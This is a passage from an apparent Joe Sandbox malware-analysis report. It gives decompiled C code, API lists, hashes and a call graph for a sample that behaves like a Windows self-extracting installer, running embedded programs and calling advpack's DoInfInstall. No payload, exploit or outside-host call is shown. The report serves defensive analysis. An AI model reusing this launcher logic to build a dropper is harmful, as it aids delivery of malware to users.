				if( *_t16 == 0x5c) {
					goto L7;
				}
				goto L11;
			}









                                                                                                                                                                                                                                                0x001065e8
                                                                                                                                                                                                                                                0x001065ed
                                                                                                                                                                                                                                                0x001065ef
                                                                                                                                                                                                                                                0x001065f2
                                                                                                                                                                                                                                                0x001065f4
                                                                                                                                                                                                                                                0x001065f4
                                                                                                                                                                                                                                                0x001065f6
                                                                                                                                                                                                                                                0x001065f7
                                                                                                                                                                                                                                                0x00106608
                                                                                                                                                                                                                                                0x00106611
                                                                                                                                                                                                                                                0x00106618
                                                                                                                                                                                                                                                0x0010661c
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x0010660e
                                                                                                                                                                                                                                                0x00106623
                                                                                                                                                                                                                                                0x00106625
                                                                                                                                                                                                                                                0x0010663b
                                                                                                                                                                                                                                                0x0010663b
                                                                                                                                                                                                                                                0x0010663d
                                                                                                                                                                                                                                                0x00106641
                                                                                                                                                                                                                                                0x00106610
                                                                                                                                                                                                                                                0x00106610
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00106610
                                                                                                                                                                                                                                                0x00106644
                                                                                                                                                                                                                                                0x00106647
                                                                                                                                                                                                                                                0x00106647
                                                                                                                                                                                                                                                0x00106621
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00000000

                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                • CharPrevA.USER32(?,00000000,00000000,00000001,00000000,00102B33), ref: 00106602
                                                                                                                                                                                                                                                • CharPrevA.USER32(?,00000000), ref: 00106612
                                                                                                                                                                                                                                                • CharPrevA.USER32(?,00000000), ref: 00106629
                                                                                                                                                                                                                                                • CharNextA.USER32(00000000), ref: 00106635
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000002.00000002.382576987.0000000000101000.00000020.00000001.01000000.00000005.sdmp, Offset: 00100000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.382559810.0000000000100000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.382590761.0000000000108000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.382603847.000000000010A000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.382603847.000000000010C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_2_2_100000_gDR79xP.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: Char$Prev$Next
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID: 3260447230-0
                                                                                                                                                                                                                                                • Opcode ID: 9f906c4bf5fd422aa0b3973452d950c6957d0eac048018f971ad2721f4f82a2a
                                                                                                                                                                                                                                                • Instruction ID: 783b166e82a63e5b329eee23ea0c57b9319e0a13e3e347089b6f508b84409ec9
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 9f906c4bf5fd422aa0b3973452d950c6957d0eac048018f971ad2721f4f82a2a
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 1BF028320046506EE7325B288C888BBBF9CCF87354B2901AFF5D182441D7E60D468661
                                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                Function 001069B0 Relevance: 6.0, APIs: 4, Instructions: 25COMMON
                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                C-Code - Quality: 100%
                                                                                                                                                                                                                                                			E001069B0() {
				intOrPtr* _t4;
				intOrPtr* _t5;
				void* _t6;
				intOrPtr _t11;
				intOrPtr _t12;

				 *0x1081f8 = E00106C70();
				__set_app_type(E00106FBE(2));
				 *0x1088a4 =  *0x1088a4 | 0xffffffff;
				 *0x1088a8 =  *0x1088a8 | 0xffffffff;
				_t4 = __p__fmode();
				_t11 =  *0x108528; // 0x0
				 *_t4 = _t11;
				_t5 = __p__commode();
				_t12 =  *0x10851c; // 0x0
				 *_t5 = _t12;
				_t6 = E00107000();
				if( *0x108000 == 0) {
					__setusermatherr(E00107000);
				}
				E001071EF(_t6);
				return 0;
			}








                                                                                                                                                                                                                                                0x001069b7
                                                                                                                                                                                                                                                0x001069c2
                                                                                                                                                                                                                                                0x001069c8
                                                                                                                                                                                                                                                0x001069cf
                                                                                                                                                                                                                                                0x001069d8
                                                                                                                                                                                                                                                0x001069de
                                                                                                                                                                                                                                                0x001069e4
                                                                                                                                                                                                                                                0x001069e6
                                                                                                                                                                                                                                                0x001069ec
                                                                                                                                                                                                                                                0x001069f2
                                                                                                                                                                                                                                                0x001069f4
                                                                                                                                                                                                                                                0x00106a00
                                                                                                                                                                                                                                                0x00106a07
                                                                                                                                                                                                                                                0x00106a0d
                                                                                                                                                                                                                                                0x00106a0e
                                                                                                                                                                                                                                                0x00106a15

                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                  • Part of subcall function 00106FBE: GetModuleHandleW.KERNEL32(00000000), ref: 00106FC5
                                                                                                                                                                                                                                                • __set_app_type.MSVCRT ref: 001069C2
                                                                                                                                                                                                                                                • __p__fmode.MSVCRT ref: 001069D8
                                                                                                                                                                                                                                                • __p__commode.MSVCRT ref: 001069E6
                                                                                                                                                                                                                                                • __setusermatherr.MSVCRT ref: 00106A07
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000002.00000002.382576987.0000000000101000.00000020.00000001.01000000.00000005.sdmp, Offset: 00100000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.382559810.0000000000100000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.382590761.0000000000108000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.382603847.000000000010A000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.382603847.000000000010C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_2_2_100000_gDR79xP.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: HandleModule__p__commode__p__fmode__set_app_type__setusermatherr
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID: 1632413811-0
                                                                                                                                                                                                                                                • Opcode ID: 48ba07bb662f68a91d0c8d0413d1bfda5dabe796f5918882a5220416987eb0c9
                                                                                                                                                                                                                                                • Instruction ID: 17b34b2a1482e90e278211b55b71077f95117bf4aa41fe163887cefaaaead0ba
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 48ba07bb662f68a91d0c8d0413d1bfda5dabe796f5918882a5220416987eb0c9
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: B9F0927050C3018FE759AB34AE0A6087BA1FB15321B504A29F4E286AE1CFFA95D58A15
                                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                Callgraph

                                                                                                                                                                                                                                                • Executed
                                                                                                                                                                                                                                                • Not Executed
                                                                                                                                                                                                                                                • Opacity -> Relevance
                                                                                                                                                                                                                                                • Disassembly available
                                                                                                                                                                                                                                                callgraph 0 Function_010E490C 1 Function_010E7208 2 Function_010E4702 57 Function_010E1680 2->57 83 Function_010E16B3 2->83 3 Function_010E6C03 26 Function_010E724D 3->26 4 Function_010E7000 5 Function_010E4200 6 Function_010E3100 95 Function_010E43D0 6->95 7 Function_010E171E 8 Function_010E621E 45 Function_010E597D 8->45 55 Function_010E6285 8->55 81 Function_010E44B9 8->81 108 Function_010E6CE0 8->108 9 Function_010E681F 9->108 116 Function_010E66F9 9->116 10 Function_010E2F1D 10->8 18 Function_010E3B26 10->18 22 Function_010E3A3F 10->22 34 Function_010E256D 10->34 36 Function_010E4169 10->36 39 Function_010E5164 10->39 51 Function_010E658A 10->51 10->55 73 Function_010E3BA2 10->73 77 Function_010E55A0 10->77 10->81 105 Function_010E51E5 10->105 10->108 11 Function_010E411B 71 Function_010E1EA7 11->71 12 Function_010E5C17 13 Function_010E6517 13->81 14 Function_010E3210 19 Function_010E4224 14->19 14->45 14->51 14->81 85 Function_010E58C8 14->85 14->95 15 Function_010E7010 16 Function_010E6E2A 117 Function_010E6CF0 16->117 17 Function_010E202A 17->7 17->51 17->81 17->108 18->13 62 Function_010E6298 18->62 106 Function_010E4FE0 18->106 19->57 19->81 20 Function_010E7120 21 Function_010E6A20 22->13 50 Function_010E468F 22->50 22->55 22->81 23 Function_010E6C3F 24 Function_010E4C37 25 Function_010E2630 25->81 25->108 27 Function_010E6648 28 Function_010E6F40 29 Function_010E6F54 29->1 29->26 30 Function_010E7155 31 Function_010E6952 32 Function_010E4A50 33 Function_010E3450 33->95 107 Function_010E24E0 34->107 35 Function_010E476D 35->13 68 Function_010E66AE 35->68 36->50 36->81 37 Function_010E5467 37->45 37->51 37->55 37->57 60 Function_010E1781 37->60 78 Function_010E53A1 37->78 37->85 37->108 38 Function_010E2267 38->7 38->51 38->108 39->50 39->62 39->81 40 Function_010E4B60 41 Function_010E6A60 41->1 41->23 41->26 41->30 42 Function_010E7060 41->42 115 Function_010E2BFB 41->115 42->15 42->20 43 Function_010E6760 44 Function_010E667F 44->27 52 Function_010E268B 45->52 45->55 45->81 45->108 46 Function_010E487A 46->0 47 Function_010E2773 47->51 47->57 47->60 47->108 48 Function_010E7270 49 Function_010E6C70 51->83 52->7 52->81 52->108 53 Function_010E2A89 54 Function_010E1A84 54->44 56 Function_010E4980 56->46 56->81 57->60 58 Function_010E3680 59 Function_010E6380 61 Function_010E5C9E 61->12 61->16 61->44 61->51 61->57 61->81 86 Function_010E66C8 61->86 61->108 109 Function_010E31E0 61->109 62->7 62->108 63 Function_010E4E99 63->57 64 Function_010E6495 64->51 64->60 64->108 65 Function_010E6793 66 Function_010E2390 66->51 66->57 66->66 66->83 66->108 67 Function_010E1F90 67->71 67->81 67->108 69 Function_010E2AAC 69->57 87 Function_010E17C8 69->87 104 Function_010E65E8 69->104 69->108 70 Function_010E2CAA 70->13 70->50 70->61 70->66 75 Function_010E18A3 70->75 70->81 96 Function_010E36EE 70->96 70->108 71->34 72 Function_010E6FA5 72->26 73->17 73->38 73->50 73->55 73->60 73->64 73->81 98 Function_010E3FEF 73->98 102 Function_010E1AE8 73->102 73->108 74 Function_010E72A2 97 Function_010E17EE 75->97 75->108 76 Function_010E4CA0 77->13 77->25 77->31 77->37 77->45 77->50 77->51 77->55 77->60 77->81 77->108 78->7 78->51 78->57 78->108 79 Function_010E6FA1 80 Function_010E6FBE 80->29 81->7 81->9 81->57 88 Function_010E67C9 81->88 81->108 82 Function_010E52B6 82->60 82->66 82->104 82->108 112 Function_010E1FE1 82->112 83->60 84 Function_010E69B0 84->4 84->49 84->80 99 Function_010E71EF 84->99 85->51 85->55 85->57 85->81 86->27 88->65 89 Function_010E4CC0 90 Function_010E4BC0 91 Function_010E30C0 92 Function_010E63C0 92->51 92->60 92->108 93 Function_010E4AD0 93->58 94 Function_010E4CD0 94->2 94->24 94->35 94->40 94->56 94->63 94->108 110 Function_010E47E0 94->110 95->108 96->9 96->53 96->81 96->88 103 Function_010E28E8 96->103 96->108 97->108 98->11 98->55 98->81 98->108 100 Function_010E6BEF 101 Function_010E70EB 102->7 102->51 102->54 102->57 102->60 102->69 102->81 102->83 102->86 102->108 103->47 103->53 105->50 105->55 105->81 106->50 106->81 114 Function_010E4EFD 106->114 107->51 107->108 108->117 110->57 110->81 111 Function_010E19E0 111->95 111->108 113 Function_010E70FE 114->40 114->56 114->108 115->10 115->67 115->70 115->82 118 Function_010E34F0 118->58 118->81 118->95 119 Function_010E6EF0

                                                                                                                                                                                                                                                Executed Functions

                                                                                                                                                                                                                                                Function 010E3BA2 Relevance: 40.6, APIs: 11, Strings: 12, Instructions: 308libraryloaderCOMMONCrypto
                                                                                                                                                                                                                                                Download Yara Rule

                                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                                • Executed
                                                                                                                                                                                                                                                • Not Executed
                                                                                                                                                                                                                                                control_flow_graph 36 10e3ba2-10e3bd9 37 10e3bfd-10e3bff 36->37 38 10e3bdb-10e3bee call 10e468f 36->38 40 10e3c03-10e3c28 memset 37->40 44 10e3bf4-10e3bf7 38->44 45 10e3d13-10e3d30 call 10e44b9 38->45 42 10e3c2e-10e3c40 call 10e468f 40->42 43 10e3d35-10e3d48 call 10e1781 40->43 42->45 54 10e3c46-10e3c49 42->54 49 10e3d4d-10e3d52 43->49 44->37 44->45 55 10e3f4d 45->55 52 10e3d9e-10e3db6 call 10e1ae8 49->52 53 10e3d54-10e3d6c call 10e468f 49->53 52->55 66 10e3dbc-10e3dc2 52->66 53->45 68 10e3d6e-10e3d75 53->68 54->45 57 10e3c4f-10e3c56 54->57 60 10e3f4f-10e3f63 call 10e6ce0 55->60 62 10e3c58-10e3c5e 57->62 63 10e3c60-10e3c65 57->63 69 10e3c6e-10e3c73 62->69 64 10e3c67-10e3c6d 63->64 65 10e3c75-10e3c7c 63->65 64->69 72 10e3c87-10e3c89 65->72 73 10e3c7e-10e3c82 65->73 70 10e3de6-10e3de8 66->70 71 10e3dc4-10e3dce 66->71 75 10e3fda-10e3fe1 68->75 76 10e3d7b-10e3d98 CompareStringA 68->76 69->72 79 10e3dee-10e3df5 70->79 80 10e3f0b-10e3f15 call 10e3fef 70->80 71->70 77 10e3dd0-10e3dd7 71->77 72->49 78 10e3c8f-10e3c98 72->78 73->72 81 10e3fe8-10e3fea 75->81 82 10e3fe3 call 10e2267 75->82 76->52 76->75 77->70 84 10e3dd9-10e3ddb 77->84 85 10e3c9a-10e3c9c 78->85 86 10e3cf1-10e3cf3 78->86 87 10e3fab-10e3fd2 call 10e44b9 LocalFree 79->87 88 10e3dfb-10e3dfd 79->88 91 10e3f1a-10e3f1c 80->91 81->60 82->81 84->79 92 10e3ddd-10e3de1 call 10e202a 84->92 94 10e3c9e-10e3ca3 85->94 95 10e3ca5-10e3ca7 85->95 86->52 90 10e3cf9-10e3d11 call 10e468f 86->90 87->55 88->80 96 10e3e03-10e3e0a 88->96 90->45 90->49 98 10e3f1e-10e3f2d LocalFree 91->98 99 10e3f46-10e3f47 LocalFree 91->99 92->70 102 10e3cb2-10e3cc5 call 10e468f 94->102 95->55 103 10e3cad 95->103 96->80 104 10e3e10-10e3e19 call 10e6495 96->104 106 10e3fd7-10e3fd9 98->106 107 10e3f33-10e3f3b 98->107 99->55 102->45 112 10e3cc7-10e3ce8 CompareStringA 102->112 103->102 113 10e3e1f-10e3e36 GetProcAddress 104->113 114 10e3f92-10e3fa9 call 10e44b9 104->114 106->75 107->40 112->86 116 10e3cea-10e3ced 112->116 117 10e3e3c-10e3e80 113->117 118 10e3f64-10e3f76 call 10e44b9 FreeLibrary 113->118 125 10e3f7c-10e3f90 LocalFree call 10e6285 114->125 116->86 119 10e3e8b-10e3e94 117->119 120 10e3e82-10e3e87 117->120 118->125 123 10e3e9f-10e3ea2 119->123 124 10e3e96-10e3e9b 119->124 120->119 128 10e3ead-10e3eb6 123->128 129 10e3ea4-10e3ea9 123->129 124->123 125->55 131 10e3eb8-10e3ebd 128->131 132 10e3ec1-10e3ec3 128->132 129->128 131->132 133 10e3ece-10e3eec 132->133 134 10e3ec5-10e3eca 132->134 137 10e3eee-10e3ef3 133->137 138 10e3ef5-10e3efd 133->138 134->133 137->138 139 10e3eff-10e3f09 FreeLibrary 138->139 140 10e3f40 FreeLibrary 138->140 139->98 140->99
                                                                                                                                                                                                                                                C-Code - Quality: 82%
                                                                                                                                                                                                                                                			E010E3BA2() {
				signed int _v8;
				signed int _v12;
				char _v276;
				char _v280;
				short _v300;
				intOrPtr _v304;
				void _v348;
				char _v352;
				intOrPtr _v356;
				signed int _v360;
				short _v364;
				char* _v368;
				intOrPtr _v372;
				void* _v376;
				intOrPtr _v380;
				char _v384;
				signed int _v388;
				intOrPtr _v392;
				signed int _v396;
				signed int _v400;
				signed int _v404;
				void* _v408;
				void* _v424;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t69;
				signed int _t76;
				void* _t77;
				signed int _t79;
				short _t96;
				signed int _t97;
				intOrPtr _t98;
				signed int _t101;
				signed int _t104;
				signed int _t108;
				int _t112;
				void* _t115;
				signed char _t118;
				void* _t125;
				signed int _t127;
				void* _t128;
				struct HINSTANCE__* _t129;
				void* _t130;
				short _t137;
				char* _t140;
				signed char _t144;
				signed char _t145;
				signed int _t149;
				void* _t150;
				void* _t151;
				signed int _t153;
				void* _t155;
				void* _t156;
				signed int _t157;
				signed int _t162;
				signed int _t164;
				void* _t165;

				_t164 = (_t162 & 0xfffffff8) - 0x194;
				_t69 =  *0x10e8004; // 0x71a8563c
				_v8 = _t69 ^ _t164;
				_t153 = 0;
				 *0x10e9124 =  *0x10e9124 & 0;
				_t149 = 0;
				_v388 = 0;
				_v384 = 0;
				_t165 =  *0x10e8a28 - _t153; // 0x0
				if(_t165 != 0) {
					L3:
					_t127 = 0;
					_v392 = 0;
					while(1) {
						_v400 = _v400 & 0x00000000;
						memset( &_v348, 0, 0x44);
						_t164 = _t164 + 0xc;
						_v348 = 0x44;
						if( *0x10e8c42 != 0) {
							goto L26;
						}
						_t146 =  &_v396;
						_t115 = E010E468F("SHOWWINDOW",  &_v396, 4);
						if(_t115 == 0 || _t115 > 4) {
							L25:
							_t146 = 0x4b1;
							E010E44B9(0, 0x4b1, 0, 0, 0x10, 0);
							 *0x10e9124 = 0x80070714;
							goto L62;
						} else {
							if(_v396 != 1) {
								__eflags = _v396 - 2;
								if(_v396 != 2) {
									_t137 = 3;
									__eflags = _v396 - _t137;
									if(_v396 == _t137) {
										_v304 = 1;
										_v300 = _t137;
									}
									goto L14;
								}
								_push(6);
								_v304 = 1;
								_pop(0);
								goto L11;
							} else {
								_v304 = 1;
								L11:
								_v300 = 0;
								L14:
								if(_t127 != 0) {
									L27:
									_t155 = 1;
									__eflags = _t127 - 1;
									if(_t127 != 1) {
										L31:
										_t132 =  &_v280;
										_t76 = E010E1AE8( &_v280,  &_v408,  &_v404); // executed
										__eflags = _t76;
										if(_t76 == 0) {
											L62:
											_t77 = 0;
											L63:
											_pop(_t150);
											_pop(_t156);
											_pop(_t128);
											return E010E6CE0(_t77, _t128, _v12 ^ _t164, _t146, _t150, _t156);
										}
										_t157 = _v404;
										__eflags = _t149;
										if(_t149 != 0) {
											L37:
											__eflags = _t157;
											if(_t157 == 0) {
												L57:
												_t151 = _v408;
												_t146 =  &_v352;
												_t130 = _t151; // executed
												_t79 = E010E3FEF(_t130,  &_v352); // executed
												__eflags = _t79;
												if(_t79 == 0) {
													L61:
													LocalFree(_t151);
													goto L62;
												}
												L58:
												LocalFree(_t151);
												_t127 = _t127 + 1;
												_v396 = _t127;
												__eflags = _t127 - 2;
												if(_t127 >= 2) {
													_t155 = 1;
													__eflags = 1;
													L69:
													__eflags =  *0x10e8580;
													if( *0x10e8580 != 0) {
														E010E2267();
													}
													_t77 = _t155;
													goto L63;
												}
												_t153 = _v392;
												_t149 = _v388;
												continue;
											}
											L38:
											__eflags =  *0x10e8180;
											if( *0x10e8180 == 0) {
												_t146 = 0x4c7;
												E010E44B9(0, 0x4c7, 0, 0, 0x10, 0);
												LocalFree(_v424);
												 *0x10e9124 = 0x8007042b;
												goto L62;
											}
											__eflags = _t157;
											if(_t157 == 0) {
												goto L57;
											}
											__eflags =  *0x10e9a34 & 0x00000004;
											if(__eflags == 0) {
												goto L57;
											}
											_t129 = E010E6495(_t127, _t132, _t157, __eflags);
											__eflags = _t129;
											if(_t129 == 0) {
												_t146 = 0x4c8;
												E010E44B9(0, 0x4c8, "advpack.dll", 0, 0x10, 0);
												L65:
												LocalFree(_v408);
												 *0x10e9124 = E010E6285();
												goto L62;
											}
											_t146 = GetProcAddress(_t129, "DoInfInstall");
											_v404 = _t146;
											__eflags = _t146;
											if(_t146 == 0) {
												_t146 = 0x4c9;
												__eflags = 0;
												E010E44B9(0, 0x4c9, "DoInfInstall", 0, 0x10, 0);
												FreeLibrary(_t129);
												goto L65;
											}
											__eflags =  *0x10e8a30;
											_t151 = _v408;
											_v384 = 0;
											_v368 =  &_v280;
											_t96 =  *0x10e9a40; // 0x3
											_v364 = _t96;
											_t97 =  *0x10e8a38 & 0x0000ffff;
											_v380 = 0x10e9154;
											_v376 = _t151;
											_v372 = 0x10e91e4;
											_v360 = _t97;
											if( *0x10e8a30 != 0) {
												_t97 = _t97 | 0x00010000;
												__eflags = _t97;
												_v360 = _t97;
											}
											_t144 =  *0x10e9a34; // 0x1
											__eflags = _t144 & 0x00000008;
											if((_t144 & 0x00000008) != 0) {
												_t97 = _t97 | 0x00020000;
												__eflags = _t97;
												_v360 = _t97;
											}
											__eflags = _t144 & 0x00000010;
											if((_t144 & 0x00000010) != 0) {
												_t97 = _t97 | 0x00040000;
												__eflags = _t97;
												_v360 = _t97;
											}
											_t145 =  *0x10e8d48; // 0x0
											__eflags = _t145 & 0x00000040;
											if((_t145 & 0x00000040) != 0) {
												_t97 = _t97 | 0x00080000;
												__eflags = _t97;
												_v360 = _t97;
											}
											__eflags = _t145;
											if(_t145 < 0) {
												_t104 = _t97 | 0x00100000;
												__eflags = _t104;
												_v360 = _t104;
											}
											_t98 =  *0x10e9a38; // 0x0
											_v356 = _t98;
											_t130 = _t146;
											 *0x10ea288( &_v384);
											_t101 = _v404();
											__eflags = _t164 - _t164;
											if(_t164 != _t164) {
												_t130 = 4;
												asm("int 0x29");
											}
											 *0x10e9124 = _t101;
											_push(_t129);
											__eflags = _t101;
											if(_t101 < 0) {
												FreeLibrary();
												goto L61;
											} else {
												FreeLibrary();
												_t127 = _v400;
												goto L58;
											}
										}
										__eflags =  *0x10e9a40 - 1; // 0x3
										if(__eflags == 0) {
											goto L37;
										}
										__eflags =  *0x10e8a20;
										if( *0x10e8a20 == 0) {
											goto L37;
										}
										__eflags = _t157;
										if(_t157 != 0) {
											goto L38;
										}
										_v388 = 1;
										E010E202A(_t146); // executed
										goto L37;
									}
									_t146 =  &_v280;
									_t108 = E010E468F("POSTRUNPROGRAM",  &_v280, 0x104);
									__eflags = _t108;
									if(_t108 == 0) {
										goto L25;
									}
									__eflags =  *0x10e8c42;
									if( *0x10e8c42 != 0) {
										goto L69;
									}
									_t112 = CompareStringA(0x7f, 1,  &_v280, 0xffffffff, "<None>", 0xffffffff);
									__eflags = _t112 == 0;
									if(_t112 == 0) {
										goto L69;
									}
									goto L31;
								}
								_t118 =  *0x10e8a38; // 0x0
								if(_t118 == 0) {
									L23:
									if(_t153 != 0) {
										goto L31;
									}
									_t146 =  &_v276;
									if(E010E468F("RUNPROGRAM",  &_v276, 0x104) != 0) {
										goto L27;
									}
									goto L25;
								}
								if((_t118 & 0x00000001) == 0) {
									__eflags = _t118 & 0x00000002;
									if((_t118 & 0x00000002) == 0) {
										goto L62;
									}
									_t140 = "USRQCMD";
									L20:
									_t146 =  &_v276;
									if(E010E468F(_t140,  &_v276, 0x104) == 0) {
										goto L25;
									}
									if(CompareStringA(0x7f, 1,  &_v276, 0xffffffff, "<None>", 0xffffffff) - 2 != 0xfffffffe) {
										_t153 = 1;
										_v388 = 1;
									}
									goto L23;
								}
								_t140 = "ADMQCMD";
								goto L20;
							}
						}
						L26:
						_push(_t130);
						_t146 = 0x104;
						E010E1781( &_v276, 0x104, _t130, 0x10e8c42);
						goto L27;
					}
				}
				_t130 = "REBOOT";
				_t125 = E010E468F(_t130, 0x10e9a2c, 4);
				if(_t125 == 0 || _t125 > 4) {
					goto L25;
				} else {
					goto L3;
				}
			}





























































                                                                                                                                                                                                                                                0x010e3baa
                                                                                                                                                                                                                                                0x010e3bb0
                                                                                                                                                                                                                                                0x010e3bb7
                                                                                                                                                                                                                                                0x010e3bc0
                                                                                                                                                                                                                                                0x010e3bc2
                                                                                                                                                                                                                                                0x010e3bc9
                                                                                                                                                                                                                                                0x010e3bcb
                                                                                                                                                                                                                                                0x010e3bcf
                                                                                                                                                                                                                                                0x010e3bd3
                                                                                                                                                                                                                                                0x010e3bd9
                                                                                                                                                                                                                                                0x010e3bfd
                                                                                                                                                                                                                                                0x010e3bfd
                                                                                                                                                                                                                                                0x010e3bff
                                                                                                                                                                                                                                                0x010e3c03
                                                                                                                                                                                                                                                0x010e3c03
                                                                                                                                                                                                                                                0x010e3c11
                                                                                                                                                                                                                                                0x010e3c16
                                                                                                                                                                                                                                                0x010e3c19
                                                                                                                                                                                                                                                0x010e3c28
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x010e3c30
                                                                                                                                                                                                                                                0x010e3c39
                                                                                                                                                                                                                                                0x010e3c40
                                                                                                                                                                                                                                                0x010e3d13
                                                                                                                                                                                                                                                0x010e3d15
                                                                                                                                                                                                                                                0x010e3d21
                                                                                                                                                                                                                                                0x010e3d26
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x010e3c4f
                                                                                                                                                                                                                                                0x010e3c56
                                                                                                                                                                                                                                                0x010e3c60
                                                                                                                                                                                                                                                0x010e3c65
                                                                                                                                                                                                                                                0x010e3c77
                                                                                                                                                                                                                                                0x010e3c78
                                                                                                                                                                                                                                                0x010e3c7c
                                                                                                                                                                                                                                                0x010e3c7e
                                                                                                                                                                                                                                                0x010e3c82
                                                                                                                                                                                                                                                0x010e3c82
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x010e3c7c
                                                                                                                                                                                                                                                0x010e3c67
                                                                                                                                                                                                                                                0x010e3c69
                                                                                                                                                                                                                                                0x010e3c6d
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x010e3c58
                                                                                                                                                                                                                                                0x010e3c58
                                                                                                                                                                                                                                                0x010e3c6e
                                                                                                                                                                                                                                                0x010e3c6e
                                                                                                                                                                                                                                                0x010e3c87
                                                                                                                                                                                                                                                0x010e3c89
                                                                                                                                                                                                                                                0x010e3d4d
                                                                                                                                                                                                                                                0x010e3d4f
                                                                                                                                                                                                                                                0x010e3d50
                                                                                                                                                                                                                                                0x010e3d52
                                                                                                                                                                                                                                                0x010e3d9e
                                                                                                                                                                                                                                                0x010e3da8
                                                                                                                                                                                                                                                0x010e3daf
                                                                                                                                                                                                                                                0x010e3db4
                                                                                                                                                                                                                                                0x010e3db6
                                                                                                                                                                                                                                                0x010e3f4d
                                                                                                                                                                                                                                                0x010e3f4d
                                                                                                                                                                                                                                                0x010e3f4f
                                                                                                                                                                                                                                                0x010e3f56
                                                                                                                                                                                                                                                0x010e3f57
                                                                                                                                                                                                                                                0x010e3f58
                                                                                                                                                                                                                                                0x010e3f63
                                                                                                                                                                                                                                                0x010e3f63
                                                                                                                                                                                                                                                0x010e3dbc
                                                                                                                                                                                                                                                0x010e3dc0
                                                                                                                                                                                                                                                0x010e3dc2
                                                                                                                                                                                                                                                0x010e3de6
                                                                                                                                                                                                                                                0x010e3de6
                                                                                                                                                                                                                                                0x010e3de8
                                                                                                                                                                                                                                                0x010e3f0b
                                                                                                                                                                                                                                                0x010e3f0b
                                                                                                                                                                                                                                                0x010e3f0f
                                                                                                                                                                                                                                                0x010e3f13
                                                                                                                                                                                                                                                0x010e3f15
                                                                                                                                                                                                                                                0x010e3f1a
                                                                                                                                                                                                                                                0x010e3f1c
                                                                                                                                                                                                                                                0x010e3f46
                                                                                                                                                                                                                                                0x010e3f47
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x010e3f47
                                                                                                                                                                                                                                                0x010e3f1e
                                                                                                                                                                                                                                                0x010e3f1f
                                                                                                                                                                                                                                                0x010e3f25
                                                                                                                                                                                                                                                0x010e3f26
                                                                                                                                                                                                                                                0x010e3f2a
                                                                                                                                                                                                                                                0x010e3f2d
                                                                                                                                                                                                                                                0x010e3fd9
                                                                                                                                                                                                                                                0x010e3fd9
                                                                                                                                                                                                                                                0x010e3fda
                                                                                                                                                                                                                                                0x010e3fda
                                                                                                                                                                                                                                                0x010e3fe1
                                                                                                                                                                                                                                                0x010e3fe3
                                                                                                                                                                                                                                                0x010e3fe3
                                                                                                                                                                                                                                                0x010e3fe8
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x010e3fe8
                                                                                                                                                                                                                                                0x010e3f33
                                                                                                                                                                                                                                                0x010e3f37
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x010e3f37
                                                                                                                                                                                                                                                0x010e3dee
                                                                                                                                                                                                                                                0x010e3dee
                                                                                                                                                                                                                                                0x010e3df5
                                                                                                                                                                                                                                                0x010e3fad
                                                                                                                                                                                                                                                0x010e3fb9
                                                                                                                                                                                                                                                0x010e3fc2
                                                                                                                                                                                                                                                0x010e3fc8
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x010e3fc8
                                                                                                                                                                                                                                                0x010e3dfb
                                                                                                                                                                                                                                                0x010e3dfd
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x010e3e03
                                                                                                                                                                                                                                                0x010e3e0a
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x010e3e15
                                                                                                                                                                                                                                                0x010e3e17
